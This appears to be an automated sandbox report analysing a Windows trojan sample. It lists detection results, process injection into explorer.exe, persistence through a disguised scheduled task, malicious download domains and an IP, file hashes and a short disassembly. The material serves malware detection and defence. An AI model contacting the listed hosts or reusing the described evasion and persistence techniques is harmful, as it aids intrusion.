                      Source: explorer.exe, 00000005.00000000.271036604.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.301477974.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.329726697.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeCode function: 0_2_0041CC30 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0041CC30

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 18.2.brgfgda.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.brgfgda.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.4cqJ4Jjd5j.exe.25015a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.brgfgda.25d15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.brgfgda.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.4cqJ4Jjd5j.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.brgfgda.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.416720371.00000000006C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.350531051.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.416678230.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.350835390.0000000002431000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.331229772.0000000002941000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 18.2.brgfgda.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.brgfgda.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.4cqJ4Jjd5j.exe.25015a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.brgfgda.25d15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.brgfgda.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.4cqJ4Jjd5j.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.brgfgda.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.416720371.00000000006C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.350531051.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.416678230.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.350835390.0000000002431000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.331229772.0000000002941000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      512
                      Process Injection
                      11
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
                      Non-Application Layer Protocol
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      12
                      Virtualization/Sandbox Evasion
                      LSASS Memory411
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth112
                      Application Layer Protocol
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
                      Process Injection
                      Security Account Manager12
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Hidden Files and Directories
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common3
                      Software Packing
                      Cached Domain Credentials4
                      System Information Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      File Deletion
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 678224 Sample: 4cqJ4Jjd5j.exe Startdate: 03/08/2022 Architecture: WINDOWS Score: 100 30 Multi AV Scanner detection for domain / URL 2->30 32 Antivirus detection for URL or domain 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 4 other signatures 2->36 7 4cqJ4Jjd5j.exe 2->7         started        9 brgfgda 2->9         started        process3 signatures4 12 4cqJ4Jjd5j.exe 7->12         started        46 Multi AV Scanner detection for dropped file 9->46 48 Machine Learning detection for dropped file 9->48 50 Contains functionality to inject code into remote processes 9->50 52 Injects a PE file into a foreign processes 9->52 15 brgfgda 9->15         started        process5 signatures6 54 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->54 56 Maps a DLL or memory area into another process 12->56 58 Checks if the current machine is a virtual machine (disk enumeration) 12->58 17 explorer.exe 2 12->17 injected 60 Creates a thread in another existing process (thread injection) 15->60 process7 dnsIp8 26 host-file-host6.com 34.118.39.10, 49755, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\brgfgda, PE32 17->22 dropped 24 C:\Users\user\...\brgfgda:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      4cqJ4Jjd5j.exe39%VirustotalBrowse
                      4cqJ4Jjd5j.exe44%ReversingLabsWin32.Trojan.Vigorf
                      4cqJ4Jjd5j.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\brgfgda100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\brgfgda39%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\brgfgda44%ReversingLabsWin32.Trojan.Vigorf
                      SourceDetectionScannerLabelLinkDownload
                      18.0.brgfgda.400000.2.unpack100%AviraTR/Patched.GenDownload File
                      18.0.brgfgda.400000.1.unpack100%AviraTR/Patched.GenDownload File
                      18.0.brgfgda.400000.3.unpack100%AviraTR/Patched.GenDownload File
                      18.0.brgfgda.400000.0.unpack100%AviraTR/Patched.GenDownload File
                      18.0.brgfgda.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.4cqJ4Jjd5j.exe.400000.0.unpack100%AviraHEUR/AGEN.1229097Download File
                      18.2.brgfgda.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.4cqJ4Jjd5j.exe.25015a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.4cqJ4Jjd5j.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.brgfgda.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.4cqJ4Jjd5j.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.4cqJ4Jjd5j.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.brgfgda.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.brgfgda.25d15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.brgfgda.400000.0.unpack100%AviraHEUR/AGEN.1229097Download File
                      1.0.4cqJ4Jjd5j.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      SourceDetectionScannerLabelLink
                      host-file-host6.com25%VirustotalBrowse
                      host-host-file8.com22%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://host-file-host6.com/0%URL Reputationsafe
                      http://host-host-file8.com/100%URL Reputationmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      host-file-host6.com
                      34.118.39.10
                      truetrueunknown
                      host-host-file8.com
                      unknown
                      unknowntrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://host-file-host6.com/true
                      • URL Reputation: safe
                      unknown
                      http://host-host-file8.com/true
                      • URL Reputation: malware
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      34.118.39.10
                      host-file-host6.comUnited States
                      139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                      Joe Sandbox Version:35.0.0 Citrine
                      Analysis ID:678224
                      Start date and time: 03/08/202217:50:292022-08-03 17:50:29 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 41s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:4cqJ4Jjd5j.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:26
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@6/2@4/1
                      EGA Information:
                      • Successful, ratio: 75%
                      HDC Information:
                      • Successful, ratio: 98.8% (good quality ratio 83.7%)
                      • Quality average: 45.5%
                      • Quality standard deviation: 27.2%
                      HCA Information:
                      • Successful, ratio: 79%
                      • Number of executed functions: 13
                      • Number of non-executed functions: 1
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Adjust boot time
                      • Enable AMSI
                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.152.110.14, 52.242.101.226, 20.223.24.244, 20.54.89.106, 40.125.122.176
                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                      • Execution Graph export aborted for target 4cqJ4Jjd5j.exe, PID 1276 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      TimeTypeDescription
                      17:52:36Task SchedulerRun new task: Firefox Default Browser Agent 173C074F5A931F0F path: C:\Users\user\AppData\Roaming\brgfgda
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      34.118.39.106s1js8BzrC.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      CraHZCrkGP.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      ofAn3uUEPe.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      Qv4fcaX7ft.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      LmrveSjxrV.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      bkcv3m0lbI.exeGet hashmaliciousBrowse
                      • host-file-host6.com/
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      host-file-host6.com6s1js8BzrC.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      CraHZCrkGP.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      ofAn3uUEPe.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      Qv4fcaX7ft.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      LmrveSjxrV.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      bkcv3m0lbI.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      honnt2B52R.exeGet hashmaliciousBrowse
                      • 45.10.245.123
                      qgMsRC8rxY.exeGet hashmaliciousBrowse
                      • 45.10.245.123
                      dnwTgRPrMt.exeGet hashmaliciousBrowse
                      • 45.10.245.123
                      XDI45oOlKD.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      3DTODu3c3Q.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      frryhpyg7X.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      5PKLFz4ssj.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      ZqoECFonz7.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      txLwZ1Q8qA.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      rUmY6Fzdbb.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      Tw2ZBwph5T.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      gdMgIdm8jX.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      Zp85cHmvpw.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      SecuriteInfo.com.W32.AIDetect.malware1.19286.exeGet hashmaliciousBrowse
                      • 34.81.117.83
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      GOOGLE-AS-APGoogleAsiaPacificPteLtdSG6s1js8BzrC.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      CraHZCrkGP.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      ofAn3uUEPe.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      Qv4fcaX7ft.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      File.exeGet hashmaliciousBrowse
                      • 34.117.59.81
                      LmrveSjxrV.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      https://www.chockingpilotenergetic.com/Get hashmaliciousBrowse
                      • 34.117.168.233
                      bkcv3m0lbI.exeGet hashmaliciousBrowse
                      • 34.118.39.10
                      GalacticFever.exeGet hashmaliciousBrowse
                      • 34.117.59.81
                      uNtQjX264N.exeGet hashmaliciousBrowse
                      • 34.117.59.81
                      kArTtIpAD6.exeGet hashmaliciousBrowse
                      • 34.117.59.81
                      vbc.exeGet hashmaliciousBrowse
                      • 34.117.168.233
                      MnERtZQrQ5.msiGet hashmaliciousBrowse
                      • 34.117.59.81
                      Token Grab Link.exeGet hashmaliciousBrowse
                      • 34.117.59.81
                      e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exeGet hashmaliciousBrowse
                      • 34.117.59.81
                      aTlGCwT504.exeGet hashmaliciousBrowse
                      • 34.117.59.81
                      a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exeGet hashmaliciousBrowse
                      • 34.117.59.81
                      https://connecteam.sharedfileonline.com/78378378378387se7stss78941e789as8a8a78378387se7stss78941e789as8a8a88d66aa78378387se7stss78941e789as8a8a88d66aa678378387se7stss78941e789as8a8a88d66aa678378387se7stss78941e789as8a8a88d678378387se7stss78941e789as8a8a88d66aa66aa6688d66aa687se7stss78941e789as8a8a88d66a78378387se7stss78941e789as8a8a88d66aa678378387se7stss78978378387se7stss78941e789as8a8a88d66aa641e789as8a8a88d66aa6a6/?auth=helpdesk@rsccd.eduGet hashmaliciousBrowse
                      • 34.117.59.81
                      Nm0KQ1zXSJ.exeGet hashmaliciousBrowse
                      • 34.117.59.81
                      IMG-20022891.exeGet hashmaliciousBrowse
                      • 34.117.168.233
                      No context
                      No context
                      Process:C:\Windows\explorer.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):186368
                      Entropy (8bit):7.056602649646931
                      Encrypted:false
                      SSDEEP:3072:C196SvSbCDBMY3ue3PFUt76X9JfIruFeKQvd4xkESjMWD/Y:CVcmhfW6X9OihQvDF
                      MD5:C529659AD79B58EB83D1732B6CC88FF5
                      SHA1:AAD399BD653192EC0ECDEAC5C1A4CBF43AFB19B6
                      SHA-256:269200BA6ACB859B712185EBDAD2B0000333E42D194E05D12D86EB3590125AED
                      SHA-512:6E81A8A8803746E0C10B8A18EC7A1061EFC8BD6EABBBBAB4E02B0A01B21C360B1A73FB93B0A8D40961F309AE915F214A03F0E6A49024E6A000DE24FB906CA3D6
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: Virustotal, Detection: 39%, Browse
                      • Antivirus: ReversingLabs, Detection: 44%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.K...K...K...$...\...$...8...B...N...K.......$...m...$...J...$...J...RichK...........................PE..L...."`.................,...B......gg.......@....@..................................8......................................l0..<.......Pv.......................... ................................6..@............................................text...@+.......,.................. ..`.data....:...@...0...0..............@....rsrc...Pv.......x...`..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\explorer.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.056602649646931
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:4cqJ4Jjd5j.exe
                      File size:186368
                      MD5:c529659ad79b58eb83d1732b6cc88ff5
                      SHA1:aad399bd653192ec0ecdeac5c1a4cbf43afb19b6
                      SHA256:269200ba6acb859b712185ebdad2b0000333e42d194e05d12d86eb3590125aed
                      SHA512:6e81a8a8803746e0c10b8a18ec7a1061efc8bd6eabbbbab4e02b0a01b21c360b1a73fb93b0a8d40961f309ae915f214a03f0e6a49024e6a000de24fb906ca3d6
                      SSDEEP:3072:C196SvSbCDBMY3ue3PFUt76X9JfIruFeKQvd4xkESjMWD/Y:CVcmhfW6X9OihQvDF
                      TLSH:4A04AD2133E1C072D4B729309B75DAE15B3AB922E7B45B8B7760072A1F712C1BA38757
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.K...K...K...$...\...$...8...B...N...K.......$...m...$...J...$...J...RichK...........................PE..L....."`...........
                      Icon Hash:8a9199c9ca8cd2f2
                      Entrypoint:0x416767
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x602286F3 [Tue Feb 9 12:58:27 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:19d26450af6fae284e6a28f691d90382
                      Instruction
                      call 00007F36C4BD02B9h
                      jmp 00007F36C4BC9C7Eh
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      call 00007F36C4BC9E2Ch
                      xchg cl, ch
                      jmp 00007F36C4BC9E14h
                      call 00007F36C4BC9E23h
                      fxch st(0), st(1)
                      jmp 00007F36C4BC9E0Bh
                      fabs
                      fld1
                      mov ch, cl
                      xor cl, cl
                      jmp 00007F36C4BC9E01h
                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                      fabs
                      fxch st(0), st(1)
                      fabs
                      fxch st(0), st(1)
                      fpatan
                      or cl, cl
                      je 00007F36C4BC9DF6h
                      fldpi
                      fsubrp st(1), st(0)
                      or ch, ch
                      je 00007F36C4BC9DF4h
                      fchs
                      ret
                      fabs
                      fld st(0), st(0)
                      fld st(0), st(0)
                      fld1
                      fsubrp st(1), st(0)
                      fxch st(0), st(1)
                      fld1
                      faddp st(1), st(0)
                      fmulp st(1), st(0)
                      ftst
                      wait
                      fstsw word ptr [ebp-000000A0h]
                      wait
                      test byte ptr [ebp-0000009Fh], 00000001h
                      jne 00007F36C4BC9DF7h
                      xor ch, ch
                      fsqrt
                      ret
                      pop eax
                      jmp 00007F36C4BD047Fh
                      fstp st(0)
                      fld tbyte ptr [004024CAh]
                      ret
                      fstp st(0)
                      or cl, cl
                      je 00007F36C4BC9DFDh
                      fstp st(0)
                      fldpi
                      or ch, ch
                      je 00007F36C4BC9DF4h
                      fchs
                      ret
                      fstp st(0)
                      fldz
                      or ch, ch
                      je 00007F36C4BC9DE9h
                      fchs
                      ret
                      fstp st(0)
                      jmp 00007F36C4BD0455h
                      fstp st(0)
                      mov cl, ch
                      jmp 00007F36C4BC9DF2h
                      call 00007F36C4BC9DBEh
                      jmp 00007F36C4BD0460h
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      Programming Language:
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [IMP] VS2008 SP1 build 30729
                      • [C++] VS2010 build 30319
                      • [RES] VS2010 build 30319
                      • [LNK] VS2010 build 30319
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2306c0x3c.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x20a80000x7650.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x12200x1c.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x36800x40.text
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x22b400x22c00False0.7597726506294964data7.423882781109827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0x240000x2083ad00x3000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x20a80000x76500x7800False0.6784505208333333data6.280404502514193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x20a83000xea8dataKannadaKanada
                      RT_ICON0x20a91a80x8a8dataKannadaKanada
                      RT_ICON0x20a9a500x568GLS_BINARY_LSB_FIRSTKannadaKanada
                      RT_ICON0x20a9fb80x25a8dataKannadaKanada
                      RT_ICON0x20ac5600x10a8dataKannadaKanada
                      RT_ICON0x20ad6080x988dataKannadaKanada
                      RT_ICON0x20adf900x468GLS_BINARY_LSB_FIRSTKannadaKanada
                      RT_STRING0x20ae6080x67adataFrenchSwitzerland
                      RT_STRING0x20aec880x566dataFrenchSwitzerland
                      RT_STRING0x20af1f00x45edataFrenchSwitzerland
                      RT_GROUP_ICON0x20ae3f80x68dataKannadaKanada
                      RT_VERSION0x20ae4700x194data
                      None0x20ae4600xadata
                      DLLImport
                      KERNEL32.dllFoldStringA, GetLocalTime, InterlockedDecrement, GetLocaleInfoA, InterlockedCompareExchange, _hwrite, CancelWaitableTimer, GetSystemDirectoryA, CreateEventW, ReadConsoleA, VerifyVersionInfoA, BuildCommDCBA, GetConsoleAliasExesLengthA, SetSystemTimeAdjustment, PeekConsoleInputA, EnumDateFormatsA, CreateFileW, RegisterWaitForSingleObjectEx, LoadLibraryA, WaitNamedPipeA, GetEnvironmentStrings, FindResourceExA, VirtualProtect, GetFirmwareEnvironmentVariableW, GetModuleFileNameW, BeginUpdateResourceW, EnumCalendarInfoExW, WriteConsoleOutputCharacterW, WriteConsoleA, LoadLibraryW, DeleteFileW, LocalAlloc, GetProcAddress, GetModuleHandleW, GetUserDefaultLCID, FindFirstChangeNotificationW, HeapUnlock, GetCalendarInfoW, SetConsoleTitleA, GetBinaryTypeW, GetComputerNameExA, FindNextFileA, OpenJobObjectA, HeapValidate, _lclose, GetComputerNameW, SetFileShortNameW, TlsSetValue, SetCalendarInfoW, SetComputerNameW, CreateDirectoryExA, InitializeCriticalSectionAndSpinCount, FindFirstChangeNotificationA, GetVolumePathNameW, GetProcessHandleCount, GetThreadLocale, GetSystemDefaultLangID, GetCurrentProcess, ReadFile, GetStringTypeW, HeapSize, GetDiskFreeSpaceA, HeapReAlloc, RaiseException, RtlUnwind, MultiByteToWideChar, GetCommandLineW, HeapSetInformation, GetStartupInfoW, EncodePointer, HeapAlloc, GetLastError, HeapFree, IsProcessorFeaturePresent, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DecodePointer, TerminateProcess, TlsAlloc, TlsGetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, WriteFile, GetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetStdHandle, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, Sleep, LCMapStringW, WriteConsoleW
                      USER32.dllClientToScreen
                      Language of compilation systemCountry where language is spokenMap
                      KannadaKanada
                      FrenchSwitzerland
                      TimestampSource PortDest PortSource IPDest IP
                      Aug 3, 2022 17:52:36.203840017 CEST4975580192.168.2.334.118.39.10
                      Aug 3, 2022 17:52:36.240654945 CEST804975534.118.39.10192.168.2.3
                      Aug 3, 2022 17:52:36.242068052 CEST4975580192.168.2.334.118.39.10
                      Aug 3, 2022 17:52:36.242321968 CEST4975580192.168.2.334.118.39.10
                      Aug 3, 2022 17:52:36.243194103 CEST4975580192.168.2.334.118.39.10
                      Aug 3, 2022 17:52:36.279036045 CEST804975534.118.39.10192.168.2.3
                      Aug 3, 2022 17:52:36.279752016 CEST804975534.118.39.10192.168.2.3
